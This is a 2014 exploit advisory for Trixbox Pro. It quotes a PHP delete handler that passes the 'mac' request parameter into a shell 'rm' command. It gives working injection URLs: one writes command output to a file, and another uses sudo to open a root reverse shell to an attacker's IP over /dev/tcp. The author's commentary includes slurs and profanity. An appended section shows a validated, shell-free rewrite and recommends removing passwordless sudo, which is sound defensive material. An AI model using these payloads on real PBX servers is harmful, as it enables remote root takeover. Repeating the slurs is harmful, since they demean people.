Trixbox Pro Remote Command Execution
Source: n0p1337@gmail.com  Author: i-Hmx  Published: 2014-03-17
# App : Trixbox all versions
# vendor : trixbox.com
# Author : i-Hmx
# mail : n0p1337@gmail.com
# Home : security arrays inc , sec4ever.com ,exploit4arab.net

Well well well, we decided to give schmoozecom a break and have a look at
Fonality products.
Do you think they have a better product than the (award-winning) trixbox!!!
I don't think so.
"Designed and marketed for Fonality's partner community, trixbox Pro is an
IP-PBX software solution purpose built to support growing SMB businesses.
A unique hybrid hosted telephony solution; trixbox Pro provides big
business features at an SMB cost . . blah blah blah"
What do we have here??
A 3-year-old SQL injection flaw???
No big deal, and it has already been reported;
not exploited well enough, but reported.
A file disclosure flaw???
Save it for later.
Let's give Fonality a little remote root exploit xD
and also give the "Predictors" some pain in the ass trying to exploit this.
Consider it a challenge ;)
Here we go.
Vulnerable file:
/var/www/html/maint/modules/endpointcfg/endpoint_aastra.php
Piece of shit, sorry, I mean code:

    switch($action) {
        case 'Edit':
            if ($_REQUEST['newmac']){ // create a new phone from device map
                $mac_address = $_REQUEST['newmac'];
            }
            if ($_REQUEST['mac']){
                $phoneinfo = GetPhone($_REQUEST['mac'],$PhoneType);
                $mac_address=$phoneinfo['mac_address'];
            } // if there is a request ID we Edit otherwise add a new phone
            $freepbx_device_list = GetFreepbxDeviceList();
            $smarty->assign("mac_address", $mac_address);
            $smarty->assign("phone", $phoneinfo);
            $smarty->assign("freepbx_device_list", $freepbx_device_list);
            $smarty->assign("message", $message);
            $template = "endpoint_".$PhoneType."_edit.tpl";
            break;
        case 'Delete':
            exec("rm ".$sipdir.$_REQUEST['mac'].".cfg");
            getSQL("DELETE FROM ".$PhoneType." WHERE mac_address='".$_REQUEST['mac']."'",'endpoints');
            $smarty->assign("phones", ListPhones($PhoneType));
            $template = "endpoint_".$PhoneType."_list.tpl";
            break;

It's obvious we care about this line:
>>>exec("rm ".$sipdir.$_REQUEST['mac'].".cfg");<<<

Exploitation demo:
maint/modules/endpointcfg/endpoint_aastra.php?action=Delete&mac=fa;echo id>xx;faris
The result will be written to xx.

But this is not the full movie yet. I'm here to give Fonality a nightmare, which takes the form of "root" privzz.
Actually the server is configured by default to allow the web interface pages to edit many files at the root directory,
so any noob can easily execute "sudo fuck" without being prompted for a password, and the result is > root

Demo <Back connection with root privs>
maint/modules/endpointcfg/endpoint_aastra.php?action=Delete&mac=fa;sudo bash -i >%26 %2fdev%2ftcp%2fxxx.xxx.xxx.xxx%2f1337 0>%261;faris
Change to your IP and the port you are listening on
and, voila, you are root now.
I'm sure you're happy as a pig in shit xD

Still need more??
You will notice that you're unable to reach this file due to the HTTP firewall,
but actually there is a simple yet dirty trick that allows you to get past it
and execute your command as smoothly as a boat on the river ;)
And here comes the challenge, let's see what the faggots can do with this ;)
Need a hint???
Use your mind and fuck off :/

Big greets fly to all the sec4ever family.
Oh, and for VoIP lames, you can use our 0Days for sure, but once it becomes 720Days xD

Regards,
Faris <the Awesome>
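
The 'Delete' branch quoted above passes the mac parameter straight into exec("rm ..."). The block below is an added example, not part of the original advisory and not Trixbox code, showing the same delete done with input validation and unlink() instead of a shell. The function names validate_mac() and delete_phone_cfg(), the 12-hex-digit MAC format and the temporary directory are assumptions made for the demo.

```php
<?php
// Added example (not Trixbox code): a 'Delete' step that never reaches a shell.
// validate_mac() and delete_phone_cfg() are hypothetical names.

// Assumption: the mac parameter is exactly 12 hex digits (the .cfg file name stem).
function validate_mac($raw)
{
    if (!is_string($raw)) {
        return null;                    // rejects array input such as mac[]=x
    }
    // \A and \z anchor the whole string; '$' would accept a trailing newline
    return preg_match('/\A[0-9A-Fa-f]{12}\z/', $raw) ? $raw : null;
}

function delete_phone_cfg($sipdir, $rawMac)
{
    $mac = validate_mac($rawMac);
    if ($mac === null) {
        return false;                   // ';', '/', '..', quotes and spaces all fail here
    }
    $path = rtrim($sipdir, '/') . '/' . $mac . '.cfg';
    // unlink() deletes the file through a system call, so nothing is parsed by sh.
    // The same validated $mac is hex-only, so it cannot close the quoted
    // literal in the DELETE statement either; bound parameters remain preferable.
    return is_file($path) && unlink($path);
}

// Constructed demo: a temporary directory stands in for $sipdir.
$sipdir = sys_get_temp_dir() . '/sipdemo_' . getmypid();
mkdir($sipdir);
touch($sipdir . '/00085D123456.cfg');

$inputs = array(
    '00085D123456',            // well-formed value
    'fa;echo id>xx;faris',     // the mac value from the advisory's first demo
    "00085D123456\n",          // trailing newline
    '../../etc/passwd',        // path traversal attempt
    array('x'),                // array instead of string
);
foreach ($inputs as $in) {
    $result = delete_phone_cfg($sipdir, $in) ? 'deleted' : 'rejected';
    echo json_encode($in), ' => ', $result, PHP_EOL;
}
rmdir($sipdir);
```

Removing passwordless sudo from the web server account is the separate control that keeps a bug like this from ending in root.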

 